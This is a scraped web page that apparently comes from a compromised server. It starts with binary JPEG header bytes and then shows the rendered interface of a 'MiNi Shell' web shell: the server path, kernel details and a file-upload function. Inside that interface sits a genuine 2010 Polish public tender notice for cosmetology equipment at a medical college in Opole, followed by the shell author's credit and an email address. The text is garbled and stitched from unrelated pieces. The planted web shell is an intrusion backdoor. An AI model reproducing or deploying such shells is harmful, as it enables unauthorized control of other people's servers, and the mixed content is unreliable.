JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100702/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100702/175039-N-2010.html

<p class="kh_header"><b>Opole: Przetarg nieograniczony na dostawę nowego sprzętu do kosmetologii dla Państwowej Medycznej Wyższej Szkoły Zawodowej w Opolu - (nr sprawy: OPZ-381-05/10)</b><br>
<b>Numer ogłoszenia: 175039 - 2010; data zamieszczenia: 02.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Medyczna Wyższa Szkoła Zawodowa w Opolu , ul. Katowicka 68, 45-060 Opole, woj. opolskie, tel. 077 4423524, 4423520, faks 077 4423517.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wsm.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę nowego sprzętu do kosmetologii dla Państwowej Medycznej Wyższej Szkoły Zawodowej w Opolu - (nr sprawy: OPZ-381-05/10).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1). Przedmiotem zamówienia jest sprzedaż zamawiającemu wraz z montażem nowego fabrycznie sprzętu do prowadzenia zajęć z kosmetologii:
a).20szt. fotel kosmetyczny;
b).40szt. taboretów bez oparcia;
c).20szt. stolików z szufladą;
d).2szt. wózek do przyrządy;
e).2szt. Woskownica z podgrzewaczem wosku;
f).2 szt. Aparat do ultradźwięków;
g).1szt. Autoklaw;
h).20szt. Lampy z lupą;
i).1szt. Zgrzewarka;
j).1szt. Myjka ultradźwiękowa;
k).2 zestawy Parafiniarka do stóp i dłoni wraz z osprzętem;
l).5 szt. Frezarka do pedicure;
m).6 szt. Frezarki manicure / pedicure;
n).5 szt. Brodzik na kółkach;
o).2 zestawy Podgrzewacz wosku wraz z aplikatorami;
p).4 zestawy Kombajn Kosmetyczny wraz z jego osprzętem;
q).16 zestawy Kombajn wraz z galvanem i darsonwalem.   

2).Szczegółowy opis został zawarty w załączniku nr 2 do SIWZ.

3).Dodatkowe warunki dotyczące przedmiotu zamówienia:
a).Wykonawca udzieli gwarancji jakości na okres nie krótszy jak 12 miesięcy liczonych od daty podpisania przez obie strony protokołu odbioru przedmiotu zamówienia, na warunkach nie mniej korzystnych dla Zamawiającego jak określone w załączniku nr 4 do SIWZ; 
b).Wykonawca zobowiązuje się ponosić wszystkie koszty związane z naprawami gwarancyjnymi;
c).Wykonawca zapewnia odpłatny serwis pogwarancyjny;
d).Instrukcja użytkowania sprzętu - w języku polskim;
e).Wykonawca zapewnia w siedzibie zamawiającego przeszkolenie w zakresie obsługi sprzętu w terminie do 7 dni liczonych od daty dostawy ostatniego elementu sprzętu - (koszt przeszkolenia personelu  Zamawiającego wliczony w cenę określoną w pkt.14.1 SIWZ);
f).Płatność za przedmiot umowy zrealizowana będzie przelewem na konto Wykonawcy w terminie 21 dni od daty przekazania faktury Zamawiającemu, która to data nie może być wcześniejsza niż data podpisania przez strony protokołu odbioru;
g).Dostarczony sprzęt będzie posiadała niezbędne do normalnego funkcjonowania instrukcje i certyfikaty jeżeli jest takie wymagane do prawidłowe funkcjonowanie w użytkowaniu;
h).Wymaga się, aby sprzęt będący wyrobem medycznym w rozumieniu art. 3 ust.1 pkt. 17 ustawy z dnia 20.04.2004 roku (Dz. U. Nr 93 poz.896) o wyrobach medycznych, spełniał wymagania zasadnicze do których odnosi się art. 16 ust.1 ustawy o wyrobach medycznych oraz aby posiadał znak CE dla wyrobu medycznego (zgodnie z Rozporządzeniem Ministra Zdrowia z 30.04.04r. Dz. U z 2004 r. Nr 104 poz.1111 z póź. zm.); 
i).Przedmiot zamówienia opisany w pkt. 1 lit. a, e, f, g, h, i, j, k, l, m, o, p, q, będzie posiadał znak bezpieczeństwa CE; 
j).Dla przedmiotu zamówienia będącego wyrobem medycznym znak bezpieczeństwa CE będzie umieszczony zgodnie z art. 6 w zw. z art. 5 i art. 7 Ustawy o wyrobach medycznych (Dz. U z 2004 r Nr 93 poz. 896 z póź. zm.);
k).Przedmiot zamówienia będzie fabrycznie nowy, nieużywany..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1).Każda oferta musi być zabezpieczona wadium w wysokości 8.900,00 PLN (słownie : osiem tysięcy dziewięćset złotych);
2).Wadium może być wnoszone wyłącznie w formach przewidzianych w art. 45 ustawy Prawo Zamówień Publicznych;
3).Wadium w formie określonej w art.45 ust.6 pkt 2-5 ustawy Prawo Zamówień Publicznych, może być dokonane jedynie w siedzibie Zamawiającego (pokój 105 l piętro) w dni robocze od poniedziałku do piątku, pomiędzy godziną 9:00 a 15:00 i potwierdzone na pokwitowaniu odbioru przez Zamawiającego;
4).Wadium wnoszone w formie pieniężnej należy wpłacić na konto zamawiającego: Bank Milenium /o. Opole, konto nr 96 11602202 0000 0000 3638 4649
W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się datę wpływu środków na rachunek bankowy zamawiającego.
Na poleceniu przelewu lub dowodzie wpłaty należy dopisać: wpłata wadium do sprawy nr OPZ-381-5/10;
5).Wykonawca załącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu na konto zamawiającego określone w pkt 4, - jeżeli wadium zostanie wniesione w pieniądzu;
6).Wadium zostanie zwrócone bez zbędnej zwłoki, zgodnie z art.46 ust l - 2 ustawy Prawo Zamówień Publicznych;
7).Dyspozycję w zakresie zwrotu wadium wniesionego w pieniądzu, zamawiający przekaże do banku w terminie zgodnym z pkt 6;
8).Zwrot wadium w formie określonej w art.45 ust.6 pkt. 2-5 ustawy Prawo Zamówień Publicznych następuje w terminie zgodnym z pkt 6. Wydanie wadium Wykonawcy przez Zamawiającego dokonane zostanie za pokwitowaniem odbioru przez Wykonawcę w siedzibie Zamawiającego;
9).Jeżeli wadium jest wnoszone w formach gwarancji określonych w art. 45 ust.6 ustawy Prawo Zamówień Publicznych, to dokument gwarancji zapłaty wadium musi swą treścią potwierdzać, że Zamawiający zatrzymuje wadium w sytuacjach określonych przez art. 46 ust. 4a - 5, ustawy Prawo Zamówień Publicznych.
10).Zamawiający jako Beneficjent gwarancji, w okresie ważności wadium, wystąpi z pisemnym żądaniem do gwaranta wypłaty wadium jeżeli wystąpią sytuacje opisane w pkt 9 skutkujące zatrzymaniem zabezpieczenia przez Zamawiającego;
11).Jeżeli wadium jest wnoszone w formach poręczenia określonych w art. 45 ust.6 ustawy Prawo Zamówień Publicznych: 
- to dokument poręczenia zapłaty wadium musi swą treścią potwierdzać, że Zamawiający zatrzymuje wadium w sytuacjach określonych przez art. 46 ust. 4a - 5 ustawy Prawo Zamówień Publicznych;
- to, gdy zapłata wadium stanie się wymagalna wskutek zaistnienia jednej z sytuacji określonej w pkt 11, Zamawiający wyśle niezwłocznie do Wykonawcy pismo wzywające do zapłaty pełnej kwoty wynikającej z wadium w terminie jednego dnia roboczego liczonego od daty otrzymania wezwania przez Wykonawcę (za termin zapłaty kwoty wynikającej z wadium przyjmuje się datę wpływu środków na rachunek bankowy zamawiającego określony w punkcie nr 4) W sytuacji braku wpływu środków na rachunek bankowy w wyznaczonym przez Zamawiającego terminie, Zamawiający zwróci się o zapłatę wadium do poręczyciela.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, gdyż nie wymaga dokumentów na potwierdzenie spełniania warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, gdyż nie wymaga dokumentów na potwierdzenie spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, gdyż nie wymaga dokumentów na potwierdzenie spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, gdyż nie wymaga dokumentów na potwierdzenie spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, gdyż nie wymaga dokumentów na potwierdzenie spełniania warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1). W celu potwierdzenia, że oferowany sprzęt odpowiada wymaganiom określonym w załączniku nr 2 do SIWZ: 
a).na podstawie §5 ust.1 pkt.1 rozporządzenia Prezesa Rady Ministrów z dnia 19.05.2006 roku (Dz. U z 2006 roku Nr 188, poz.1155), Zamawiający wymaga:
­- opisu oferowanego przedmiotu zamówienia w postaci opisu zawartego przez Wykonawcę w kolumnie C formularza specyfikacji technicznej dostawy w/g załącznika nr 2 do SIWZ; 
­- rysunek lub zdjęcie przedstawiające każdy oferowany element przedmiotu zamówienia;
b).na podstawie §5 ust.1 pkt.2 rozporządzenia Prezesa Rady Ministrów z dnia 19.05.2006 roku (Dz. U z 2006 roku Nr 188, poz.1155), Zamawiający wymaga załączenia do oferty instrukcji obsługi w języku polskim dla każdego przedmiotu zamówienia opisanego w pkt. 3.1 lit. a, e, f, g, h, i, j, k, l, m, o, p, q SIWZ.
2). W celu potwierdzenia, że oferowany sprzęt odpowiada wymaganiom określonym w pkt. 3 lit. h pola [Określenie przedmiotu oraz wielkości lub zakresu zamówienia], na podstawie §5 ust.1 rozporządzenia Prezesa Rady Ministrów z dnia 19.05.2006 roku (Dz. U z 2006 roku Nr 188, poz.1155) Zamawiający wymaga dokumentu z Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych (zwanym dalej Urzędem) zaświadczającego wpis do Rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu (zwanym dalej Rejestrem) dla każdego przedmiotu zamówienia opisanego w pkt. 1 lit. g, lit. j pola [Określenie przedmiotu oraz wielkości lub zakresu zamówienia]. 
- Jeżeli oferowany wyrób medyczny jest kwalifikowany do kategorii I, lub IIa, (w rozumieniu art. 13 ustawy o wyrobach medycznych - Dz. U. z 2004r. Nr 93 poz. 896 z póź. zm.), to będąc dopuszczonym wspomnianą ustawą do wprowadzenia do obrotu na terenie Polski bez rejestracji w Rejestrze prowadzonym przez Urząd, wykonawca może, zamiast dokumentu zaświadczającego o wpisie do Rejestru prowadzonego przez wspomniany Urząd, przedstawić dokument zaświadczający o wpisie do rejestru prowadzonego dla wyrobów medycznych przez inne państwo UE, lub EFTA, gdzie wyrób został zarejestrowany.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1). Zmiany w obowiązujących przepisach prawa mające wpływ na przedmiot i warunki umowy oraz zmiana sytuacji prawnej lub faktycznej Wykonawcy, i/lub Zamawiającego, skutkująca niemożnością realizacji przedmiotu umowy; 2). Powstanie nadzwyczajnych okoliczności (nie będących siłą wyższą), których strony nie przewidziały przy zawarciu umowy. 3).Przedłużenie terminu realizacji umowy z uwagi na zaistnienie wcześniej obiektywnie niemożliwej do przewidzenia przez wykonawcę, lub zamawiającego, sytuacji faktycznej grożącej niewykonaniem zamówienia w umownym terminie, a zarazem wspomniana sytuacja faktyczna wynika z winy zamawiającego lub ze stanu opisanego w pkt.2.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wsm.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Medyczna Wyższa Szkoła Zawodowa w Opolu, ul. Katowicka 68, pokój 105, I piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2010 godzina 10:00, miejsce: Państwowa Medyczna Wyższa Szkoła Zawodowa w Opolu, ul. Katowicka 68, pokój 102, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca, który powołuje się w ofercie na rozwiązania równoważne opisywanym przez zamawiającego sprzęcie w załączniku nr 2 do SIWZ, jest, zgodnie z art.30 ust. 5 (ustawy Prawo Zamówień Publicznych), obowiązany wykazać, że oferowany przez niego sprzęt spełnia wymagania określone przez zamawiającego w SIWZ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com